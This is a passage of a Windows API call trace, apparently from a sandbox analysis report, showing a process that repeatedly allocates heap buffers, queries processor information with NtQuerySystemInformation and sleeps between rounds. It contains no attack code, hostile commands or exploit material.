Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0275.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0275.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0275.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0275.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0275.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.475] Sleep (dwMilliseconds=0x110) [0275.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0275.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0275.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0275.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0275.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0275.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0275.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0275.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0275.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.485] Sleep (dwMilliseconds=0x110) [0275.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0275.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0275.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0275.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0275.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0275.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0275.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0275.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0275.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.505] Sleep (dwMilliseconds=0x110) [0275.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0275.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0275.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0275.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0275.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0275.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0275.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0275.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0275.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.516] Sleep (dwMilliseconds=0x110) [0275.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0275.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0275.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0275.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0275.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0275.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0275.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0275.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0275.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.538] Sleep (dwMilliseconds=0x110) [0275.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0275.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0275.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0275.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0275.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0275.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0275.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0275.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0275.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.548] Sleep (dwMilliseconds=0x110) [0275.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0275.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0275.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0275.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0275.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0275.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0275.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0275.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0275.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.563] Sleep (dwMilliseconds=0x110) [0275.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0275.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0275.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0275.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0275.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0275.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0275.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0275.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0275.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.585] Sleep (dwMilliseconds=0x110) [0275.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0275.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0275.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0275.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0275.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0275.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0275.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0275.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0275.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.599] Sleep (dwMilliseconds=0x110) [0275.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0275.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0275.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0275.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0275.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0275.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0275.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0275.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0275.618] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.619] Sleep (dwMilliseconds=0x110) [0275.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0275.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0275.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0275.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0275.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0275.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0275.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0275.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0275.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.631] Sleep (dwMilliseconds=0x110) [0275.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0275.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0275.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0275.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0275.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0275.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0275.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0275.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0275.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.640] Sleep (dwMilliseconds=0x110) [0275.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0275.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0275.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0275.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0275.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0275.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0275.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0275.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0275.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.663] Sleep (dwMilliseconds=0x110) [0275.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0275.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0275.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0275.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0275.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0275.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0275.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0275.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.675] Sleep (dwMilliseconds=0x110) [0275.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0275.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0275.688] 